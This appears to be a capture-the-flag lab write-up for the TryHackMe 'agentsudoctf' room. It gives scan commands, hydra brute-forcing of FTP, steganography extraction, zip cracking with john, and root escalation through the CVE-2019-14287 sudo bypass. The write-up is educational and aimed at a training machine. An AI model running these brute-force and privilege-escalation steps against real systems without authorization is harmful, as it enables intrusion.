TryHackMe CTF: agentsudoctf (Easy)

Utilizes steganography with binwalk and steghide to extract hidden data from images. Employs zip2john to crack password-protected archives and Base64 decoding for credentials. Achieves privilege escalation by exploiting CVE-2019-14287 sudo vulnerability.
TryHackMe agentsudoctf room
Tags:
Ctf Nmap Nikto Gobuster Dirbuster Steganography Steghide Binwalk John Zip2john Apache Ubuntu CVE-2019–14287

URL: https://tryhackme.com/room/agentsudoctf   Easy

PHASE 1: Reconnaissance

Description of the room:

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Interesting ports found to be open:

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Also see: nmap.log

Running: gobuster

Ran the following:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://xxx.xxx.xxx.xxx

Interesting folders found:

/index.php            (Status: 200) [Size: 218]

Also see: gobuster.log

Running: nikto

Ran the following:

nikto -h xxx.xxx.xxx.xxx

Interesting info found:

--Nothing really--

Also see: nikto.log

PHASE 3: Gaining Access

There isn’t anything too interesting from scanning. We navigate to the web server running on this server and see:

Dear agents,

Use your own codename as user-agent to access the site.

From,
Agent R

Per the instructions on the main web page, you can pass in your Agent name as the User-Agent on the web page to gain access. Since it was signed by “R”, we can systematically try other letters. For example:

curl -H "User-Agent: C" -L http://10.10.13.116

From that, we can discern the username of “C”. Since both SSH and FTP are services, let’s try hydra against FTP with:

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.13.116 ftp

Sure enough, from that, we capture the FTP password for user chris.

Also see: hydra.log

Unprivileged Access

When we log into FTP as Chris, we have 3 files:

We find out from the text file:

Dear agent J,

All these alien like photos are fake! Agent R stored the real picture 
inside your directory. Your login password is somehow stored in the fake 
picture. It shouldn't be a problem for you.

From,
Agent C

By running:

steghide info ./cute-alien.jpg

We find that cute-alien.jpg has password-protected data in it. Using binwalk:

binwalk ./cutie.png

We can see there is a .zip file embedded within:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

So, we can do a:

binwalk -e ./cutie.png

to extract (-e) the hidden .zip file. That puts the embedded data into a _cutie.png.extracted subfolder. Within there, we have some files:

365
365.zlib
8702.zip
To_agentR.txt

The .zip file seems to be password-protected, so we can send that to John to crack:

zip2john ./8702.zip > ./8702.zip.hash

and then:

john ./8702.zip.hash

and very quickly, John finishes with the .zip file password:

Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
alien            (8702.zip/To_agentR.txt)

Also see: john.log

Now that we have the .zip file password, we can unzip the contents:

7z e ./8702.zip

We enter the password and To_agentR.txt gets extracted. The contents give us a perhaps-encoded word:

Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R

Using a website like https://www.base64decode.org/, we can pass in the value QXJlYTUx and get the value Area51.

We might assume that is the steg password for the other image. We try that:

steghide extract -sf ./cute-alien.jpg

That wrote out its contents to message.txt which is addressed to james and appears to have his password.

Let’s try that username/password over SSH - and sure-enough, we can log in and get the user flag, and the picture for the bonus question.

Privilege Escalation

We check to see if have any sudo privileges with sudo -l and we see an odd:

(ALL, !root) /bin/bash

By looking this up on the internet, we find an associated CVE-2019–14287

To run the exploit, instead of the intuitive:

sudo /bin/bash

Per the CVE writeups, you’d do the following to get a root prompt:

sudo -u#-1 /bin/bash

This gives you a root prompt. From there, we can get the root flag from /root/root.txt and complete the room.